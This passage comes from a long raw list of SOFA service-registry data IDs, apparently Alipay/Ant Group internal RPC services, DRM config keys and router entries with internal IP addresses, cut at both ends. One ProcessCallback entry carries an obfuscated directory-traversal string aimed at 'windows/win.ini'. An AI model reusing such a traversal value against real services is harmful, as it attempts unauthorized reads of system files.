gatti.PointService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.adbasiclib.ad.facade.AdServiceFacade:1.0:iot-dsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergw.t138.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ctu.biz.shared.analyze.EventAnalyzeSerivce:1.0:uctfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:inscommunitybff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fppolicymng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.dt.oneservice.server.common.facade.parser.SqlParserService:1.0:dponeservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesync.common.service.facade.api.SyncQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.JbSeatRiskNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstrategycenter.common.service.facade.QuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.TestAccountManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.depcore.service.facade.query.DepositQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:securitycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEscape,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.ceres.CeresPCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelEngineFacade:1.0:framodelquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.CIYamlPluginService:1.0:ciYamlPluginService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.140.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.service.facade.service.QualityConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.idc.IdentificationStateLibFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.afsc.common.service.ruleengine.service.ReScriptManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.IntimateBenefitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.bankcard.BatchInputBankCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:computeCheckLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CifPasswordQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:antinvoice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mmportal:name=com.alipay.dwebupload.client.drm.DomainConfig.djWarmUpDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findatacanal.common.service.manage.opendata.OpenDataActorManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:launchReviewTaskLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.service.drm.FPUASwitchConfigDrm.migrateUserIdFlags,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.revcore.oraclerevcore_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.service.facade.OraclePaymentInstructionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.itemcore.common.service.facade.v2.ItemSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superlink.service.facade.api.transaction.ClusterMappingService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.qa.QuestionAnswerUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.normalapp:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ienvcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.superapiGzoneTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbtraffic.common.service.facade.distribution.basket.api.DistributionBasketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.IMServiceMatrixFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerAllInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:codfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.promoprod.facade.api.ProdEquityRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instbill.common.service.facade.model.api.mng.NotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.service.PromoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bizfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.mybank.fc.price.facade.PricePortalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.securityidentify.util.LisaProductUsableConfigDrm:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundbudget.facade.api.ShadowFundBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP-S-BANKCERTIFIER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.clerktone.facade.api.activity.PromoteActivityGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.paymentmng.pcconfigWriteDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_REFUNDBILL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_S_1266#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.uctProcessRecordPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodswitch.common.service.facade.UnifiedOrderLinkOnLineCheckService:1.0:bizfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IJobMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icdpcore.common.service.facade.api.DeliveryFlowCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntAlipayCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finannafccore.facade.api.EntityFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.140.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.mapi.facade.partner.PartnerExterfaceFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acrespackagecore.common.service.facade.ResourcePackageAbossFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dchainprod.common.facade.api.decision.CreditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.rest.AntcodeCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.OptCodeManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbshopdetail@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.partner.MiniAppPartnerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.OpenProfileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ficcldc:name=com.alipay.zcbprod.common.service.facade.ldc.toggle.FacadeZoneSwitchDrm.switchRzOnLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.core.service.sync.service.CGCPSyncDataSaveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.showHisUnamed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.core.config.drm.MftransAllAccountLogQueryTableSwitchDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.isvoperation.IsvOperationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciConfigTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insproductcore.facade.service.InsChannelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_READING#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:flowDataEditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.process.task.ProcessTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.feedback.FeedbackManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_D_RPCS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:pcreditamount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:insiopweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.137.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mitemcenter.neardata.query.api.LabelQueryClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.processmng.core.service.drm.CommonDrm.antprocessSyncEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopcenter.common.service.facade.api.ShopScoreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.OffsetContactsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.175.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchcommerce.pms.common.service.facade.api.MobilePosEquipMapper:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insleads.common.service.facade.ticket.ServiceTicketFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.MstTinyAppInfoDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbworkcenter.nodejs.TemplateBuild:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.core.service.voucher.service.VoucherOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.framodel.common.service.facade.menu.MenuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.security.SecurityCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.tag.AlscTagCenterQueryBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.RoleRelationViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fincommontaskhub.service.facade.service.spi.ExecuteService:1.0:tiyubiz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.permlimit.PermLimitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.GeneralQcDialogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.gfas.core.service.drm.GfasSwitchDrm.switchEntity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gotone.common.service.api.FriendTabTodoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.181.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.common.service.facade.api.EmotionV2Facade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.RefundAfterLiquidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mipgw@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.daemon.event.drm.BankCardAsyncCompensateDrmResource.signGroupSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:tair-master-slave@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iotlab@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ordercore_antProcessCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iscProcessAuditPassCallBackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.auditprod.service.riskctrl.drm.RiskCtrlConfigDRM.disaster,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlequery.common.service.facade.withdraw.api.ExtraWithdrawQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.config.JourneyStatsQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.core.engine.service.api.ValidationService:1.0:mdevsupport@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.mayi.MiniAppAuditMemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.metadatacenter.facade.api.AppPipelineService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbcif.common.service.facade.api.siteacc.SiteAccResourceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.landlordgame.facade.api.BoxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.storedLoadTestModels,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.biz.alipayauth.service.AlipayAuthCorpAuthService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.plan.PlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.echo.platform.client.drm.EchoPlaybackConfigDrm.playbackTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeRService:1.0:instinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finecorisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fcservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:sdaxconnectplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alphad.common.service.facade.tntinst.api.ITntInstMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.service.xpas.XpasBizService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdmng.common.service.facade.InstitutionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.TemporaryStorageManageService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.cacheLogDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.arcore.common.service.facade.ArOperateStdFacade:1.0:zhiMaArOperateStdFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.HeatDrmResource.decimalFormatValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscenestarwish.common.service.facade.api.task.TaskTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iaassettrans.facade.fabs.api.consult.AccountingConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.yqdataservice.common.service.facade.po.PoFilterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.openplatform.common.service.LXProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.CheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.common.service.facade.producttemplate.MatchableProductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.UserInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdssp.service.DistributeService:1.0:distributeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.83.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.invitationSkuIdPatternText,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdabombardier.common.service.facade.relationship.IotDeviceAppIdAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instranscore.common.service.InsPaymentOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmac.common.service.masterdata.OffLineBusinessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SETTLEQUERY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:publiccore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_POINTMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gftms_generalCallbackProcess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:iopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.refreshCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chaos.dig.facade.AwatchFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.arcore.common.service.facade.ArOperateStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.test:name=com.alipay.fc.iriskperceptcenter.rpoints.drm.RpointsCommonConfigResource.indicatorResultTableName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:otaFirstApproval_CallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.FileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.AccountRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.transfer.AssetPointTransNonTwoPhaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.zcache.tbase.zprodqueryTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.benefitcore.common.service.facade.api.BenefitSendAcrossFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcs.testone.zhancheng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.insmarketingapp.InsMktProdAppPrizeExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FCRISKCTRL#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.223.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointprod.common.service.adjust.api.BatchPointAdjustService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:pointcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:pullBlockExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.basic.cluster.facade.BasicClusterQuestionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.146.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.scene.PromoPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ECOQUALITY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.QueryFundInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bumng:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.equity.recall.EquityRecallFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.custdecision.service.questionnaire.QuestionnairePermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:fundmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.QuickPointRecoveryDrmResouce.recoveryPids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.task.rpc.facade.activity.ShareInviteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cardbin.common.service.facade.CardbinOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.163.94.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_CSMOBILE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.152.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antinvoice.common.service.facade.api.client.EinvServerInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_R_CZONESYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.159.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","co